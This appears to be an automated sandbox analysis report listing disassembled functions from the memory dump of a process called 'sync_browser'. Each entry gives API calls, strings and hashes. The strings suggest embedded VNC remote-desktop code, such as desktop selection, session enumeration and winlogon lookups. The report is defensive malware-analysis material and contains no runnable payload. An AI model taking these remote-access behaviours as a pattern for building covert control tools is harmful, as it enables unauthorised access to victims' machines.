Opcode ID: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
Instruction ID: a9c5561a187f804a393d87ccd2e56a8e63887b680958f963017e025bc4bfbe3a
Opcode Fuzzy Hash: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
Instruction Fuzzy Hash: 2751F576618B86C5DB50AF26E4942E8B7B0FB98F98F494036CE5D47768DF38E484C720

Function 00007FF7400109E0 Relevance: 18.1, APIs: 12, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74000F840: CreateRectRgn.GDI32 ref: 00007FF74000F872
Part of subcall function 00007FF74000F840: CombineRgn.GDI32 ref: 00007FF74000F88A
Part of subcall function 00007FF74000F840: CombineRgn.GDI32 ref: 00007FF74000F89F

CombineRgn.GDI32 ref: 00007FF740010A5A
CombineRgn.GDI32 ref: 00007FF740010A72
CombineRgn.GDI32 ref: 00007FF740010A8A
GetRgnBox.GDI32 ref: 00007FF740010A9A
GetRgnBox.GDI32 ref: 00007FF740010AC2
GetRgnBox.GDI32 ref: 00007FF740010AE6
DeleteObject.GDI32 ref: 00007FF740010B06
free.LIBCMT ref: 00007FF740010B11
DeleteObject.GDI32 ref: 00007FF740010B1C
free.LIBCMT ref: 00007FF740010B27
DeleteObject.GDI32 ref: 00007FF740010B32
free.LIBCMT ref: 00007FF740010B3D

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Combine$DeleteObjectfree$CreateRect
String ID:
API String ID: 3143477926-0
Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
Instruction ID: 836870b7a8dbfab629e5efaf47b9cdf5c821cfe65873702c9fd8fcce3a695630
Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
Instruction Fuzzy Hash: C741197660CA82D1DA50FB16E4984AAB720FF89BD4F805122EF9E47778DE3CE545C710

Function 00007FF7400055D0 Relevance: 18.0, APIs: 7, Strings: 5, Instructions: 48COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF7400055EC
InitializeCriticalSection.KERNEL32 ref: 00007FF7400055F9
sprintf.LIBCMT ref: 00007FF740005623

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

sprintf.LIBCMT ref: 00007FF740005636
sprintf.LIBCMT ref: 00007FF740005649
sprintf.LIBCMT ref: 00007FF74000565C
sprintf.LIBCMT ref: 00007FF74000566F

Strings

0.0.0, xrefs: 00007FF74000562F
Someone, xrefs: 00007FF740005655
12-12-2002, xrefs: 00007FF740005642
Plugin.dsm, xrefs: 00007FF740005668
Unknown, xrefs: 00007FF740005605

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
API String ID: 524037307-261918508
Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
Instruction ID: 44ba466bfd6a5233dd0344cfdc3bf876ab33ec8dcb49cd1c2a2ef414a9da6866
Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
Instruction Fuzzy Hash: C021CF32518B86D1DB41AF24E9912E8B3ACFF54B48F98413ADA5C4A679DF34A255C320

Function 00007FF740026A3E Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 269COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2
CloseHandle.KERNEL32 ref: 00007FF740026A88
CloseHandle.KERNEL32 ref: 00007FF740026B01
LeaveCriticalSection.KERNEL32 ref: 00007FF740027BAC

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 4065787043-3977938048
Opcode ID: 91538cf79572d608c44060e02ed68d1d03b17946a78a771c52bf3acdc14f3e48
Instruction ID: 8218c5bc4cc261436d2f25ded140985747c5356badf8ff10ff37733b24f6e94d
Opcode Fuzzy Hash: 91538cf79572d608c44060e02ed68d1d03b17946a78a771c52bf3acdc14f3e48
Instruction Fuzzy Hash: 2EE1B022A0CA81C5E754BB25C448BBEA7A1EB85B94F954239DB5C477F9CF38F840C720

Function 00007FF74001FC70 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153threadCOMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF74001FCD7
inet_ntoa.WS2_32 ref: 00007FF74001FCE1

Part of subcall function 00007FF7400B7978: malloc.LIBCMT ref: 00007FF7400B7992

Part of subcall function 00007FF74006CEF0: getpeername.WS2_32 ref: 00007FF74006CF19
Part of subcall function 00007FF74006CEF0: inet_ntoa.WS2_32 ref: 00007FF74006CF23

Part of subcall function 00007FF7400B92A4: malloc.LIBCMT ref: 00007FF7400B92C7

OpenInputDesktop.USER32 ref: 00007FF74001FE74
GetCurrentThreadId.KERNEL32 ref: 00007FF74001FE7D
GetThreadDesktop.USER32 ref: 00007FF74001FE85
SetThreadDesktop.USER32 ref: 00007FF74001FE91

Part of subcall function 00007FF74001A810: DialogBoxParamA.USER32 ref: 00007FF74001A838

SetThreadDesktop.USER32 ref: 00007FF74001FEB0
CloseDesktop.USER32 ref: 00007FF74001FEB9

Strings

Default, xrefs: 00007FF74001FD3D
<unavailable>, xrefs: 00007FF74001FCE7

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$getpeernameinet_ntoamalloc$CloseCurrentDialogInputOpenParam
String ID: <unavailable>$Default
API String ID: 424836046-797050109
Opcode ID: b6dcc162a7e479665caaa1ca1c29d76cb599ba534f3a498a10e17cfeb49c5b9b
Instruction ID: 5e77878f2552ed206590c7e88f83a2681e4cb12b7c2c70b010aa49ccee8e391b
Opcode Fuzzy Hash: b6dcc162a7e479665caaa1ca1c29d76cb599ba534f3a498a10e17cfeb49c5b9b
Instruction Fuzzy Hash: 9E615C2660CA46C2EB60BB25D45427DB3A5FB84F84F844136DE0E4B7B9EF3AE445C320

Function 00007FF740011A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF740011A9D
GetProcAddress.KERNEL32 ref: 00007FF740011ABA
LoadLibraryA.KERNEL32 ref: 00007FF740011AD7
GetProcAddress.KERNEL32 ref: 00007FF740011AF4
FreeLibrary.KERNEL32 ref: 00007FF740011B9E
FreeLibrary.KERNEL32 ref: 00007FF740011BAD

Strings

WTSFreeMemory, xrefs: 00007FF740011AEA
wtsapi32, xrefs: 00007FF740011A96, 00007FF740011AD0
WTSEnumerateProcessesA, xrefs: 00007FF740011AB0
winlogon.exe, xrefs: 00007FF740011B50

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
API String ID: 145871493-4162899161
Opcode ID: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
Instruction ID: 8519e97832a71098dcc4597b7efa5dafaf06f2f9d779533e7cb68f88aea769b8
Opcode Fuzzy Hash: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
Instruction Fuzzy Hash: B141713660DB45C6E654BF05E8802A9B3A1FB85BA0F944135DE6D077A8EF3DF445C720

Function 00007FF740012520 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF740012551
GetProcAddress.KERNEL32 ref: 00007FF74001256E
LoadLibraryA.KERNEL32 ref: 00007FF74001258B
GetProcAddress.KERNEL32 ref: 00007FF7400125A8
FreeLibrary.KERNEL32 ref: 00007FF740012658
FreeLibrary.KERNEL32 ref: 00007FF740012667

Strings

WTSEnumerateSessionsA, xrefs: 00007FF740012564
WTSFreeMemory, xrefs: 00007FF74001259E
wtsapi32, xrefs: 00007FF74001254A, 00007FF740012584
Console, xrefs: 00007FF740012605

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
API String ID: 145871493-4083478734
Opcode ID: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
Instruction ID: 5f24d393328aecaa2950b6f4c03727891481b009210c10d63c37090bd73abb01
Opcode Fuzzy Hash: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
Instruction Fuzzy Hash: 56415E32A0DB82C5EA60FF15E84026AA2A5FF85750F980135D96D477A8EF39F464C620

Function 00007FF740020430 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF740020481
LoadLibraryA.KERNEL32 ref: 00007FF7400204CD

Part of subcall function 00007FF7400BA220: _errno.LIBCMT ref: 00007FF7400BA168
Part of subcall function 00007FF7400BA220: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400BA173

GetModuleFileNameA.KERNEL32 ref: 00007FF7400204F5
LoadLibraryA.KERNEL32 ref: 00007FF740020541
GetProcAddress.KERNEL32 ref: 00007FF740020559
FreeLibrary.KERNEL32 ref: 00007FF74002057A

Strings

\logging.dll, xrefs: 00007FF7400204AA, 00007FF74002051E
LOGLOGON, xrefs: 00007FF74002054F
LOGFAILED, xrefs: 00007FF7400204DF
vncclient.cpp : authentication failed, xrefs: 00007FF74002045F

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$FileLoadModuleName$AddressFreeProc_errno_invalid_parameter_noinfo
String ID: LOGFAILED$LOGLOGON$\logging.dll$vncclient.cpp : authentication failed
API String ID: 2822070703-2230024269
Opcode ID: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
Instruction ID: 5902b4471e6261f9776f16d2eaa91736d229ba977ba45388b87a14e85334e547
Opcode Fuzzy Hash: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
Instruction Fuzzy Hash: 3541552561CB85C1EB64FB25E8542A9A7A0FF48790FC44235DA6D43BA9DF3CF504CB60

Function 00007FF74006A4A0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 70COMMON

Download Yara Rule

APIs

OpenDesktopA.USER32 ref: 00007FF74006A4ED

Part of subcall function 00007FF74006A3B0: GetCurrentThreadId.KERNEL32 ref: 00007FF74006A3E3
Part of subcall function 00007FF74006A3B0: GetThreadDesktop.USER32 ref: 00007FF74006A3EB
Part of subcall function 00007FF74006A3B0: GetUserObjectInformationA.USER32 ref: 00007FF74006A411

OpenInputDesktop.USER32(?,?,?,00007FF74002F09C), ref: 00007FF74006A50B
CloseDesktop.USER32(?,?,?,00007FF74002F09C), ref: 00007FF74006A556
CloseDesktop.USER32(?,?,?,00007FF74002F09C), ref: 00007FF74006A58F

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74006A4B0
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF74006A4F5
vncservice.cpp : OpenInputdesktop2 , xrefs: 00007FF74006A522
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74006A53B
vncservice.cpp : SelectDesktop failed to close desktop, xrefs: 00007FF74006A560
vncservice.cpp : OpenInputdesktop2 named, xrefs: 00007FF74006A4D3

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseOpenThread$CurrentInformationInputObjectUser
String ID: vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : OpenInputdesktop2 named$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
API String ID: 82840795-1493190668
Opcode ID: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
Instruction ID: 4581903e48f5a76941e866fb4b775909b01eedaff03a97be61442b8f1adfbb09
Opcode Fuzzy Hash: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
Instruction Fuzzy Hash: F8217C64F1C942C0FB95FB26B9401FA9352BF88784FC84032DA1E86379EE3DF5518A20

Function 00007FF74006C970 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF74006C988
InitializeCriticalSection.KERNEL32 ref: 00007FF74006C992
InitializeCriticalSection.KERNEL32 ref: 00007FF74006C99F
LoadLibraryA.KERNEL32 ref: 00007FF74006CA03
GetProcAddress.KERNEL32 ref: 00007FF74006CA1F
GetProcAddress.KERNEL32 ref: 00007FF74006CA3A

Strings

SetPerTcpConnectionEStats, xrefs: 00007FF74006CA2C
Iphlpapi.dll, xrefs: 00007FF74006C9C7
GetPerTcpConnectionEStats, xrefs: 00007FF74006CA15
vsocket.cpp : VSocket() m_pDSMPlugin = NULL , xrefs: 00007FF74006C9A5

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$AddressProc$LibraryLoad
String ID: GetPerTcpConnectionEStats$Iphlpapi.dll$SetPerTcpConnectionEStats$vsocket.cpp : VSocket() m_pDSMPlugin = NULL
API String ID: 3015439405-2946900448
Opcode ID: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
Instruction ID: af8e5415aa4e9164027937d231339f69da10f23128236969c400c718f02392a8
Opcode Fuzzy Hash: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
Instruction Fuzzy Hash: F921F575A1CB82C5EB04FF24E8841A873A4FB44B48F944035CE6D56368EF78E559D370

Function 00007FF7400CD304 Relevance: 16.8, APIs: 11, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400CD32C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400CD337
__wtomb_environ.LIBCMT ref: 00007FF7400CD419
_errno.LIBCMT ref: 00007FF7400CD422
free.LIBCMT ref: 00007FF7400CD513
SetEnvironmentVariableA.KERNEL32 ref: 00007FF7400CD644
_errno.LIBCMT ref: 00007FF7400CD651
free.LIBCMT ref: 00007FF7400CD65F
free.LIBCMT ref: 00007FF7400CD66C
free.LIBCMT ref: 00007FF7400CD693

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
String ID:
API String ID: 101574016-0
Opcode ID: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
Instruction ID: 2572771f71b583036dc1469742915e241cc977508921d3d552ae7da608a41850
Opcode Fuzzy Hash: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
Instruction Fuzzy Hash: F0A18D61E1DB42C2FA2DBB15A900279F294AF84B94F848536DE5D477ADDF3CF441A320

Function 00007FF74002B510 Relevance: 16.7, APIs: 11, Instructions: 172filetimeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00007FF74002B58C
SetEndOfFile.KERNEL32 ref: 00007FF74002B5BC
FlushFileBuffers.KERNEL32 ref: 00007FF74002B5C9
SystemTimeToFileTime.KERNEL32 ref: 00007FF74002B645
SetFileTime.KERNEL32 ref: 00007FF74002B65E
CloseHandle.KERNEL32 ref: 00007FF74002B671
DeleteFileA.KERNEL32 ref: 00007FF74002B6C2
GetFileAttributesA.KERNEL32 ref: 00007FF74002B727
SetFileAttributesA.KERNEL32 ref: 00007FF74002B741
MoveFileExA.KERNEL32 ref: 00007FF74002B753
SetFileAttributesA.KERNEL32 ref: 00007FF74002B76B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
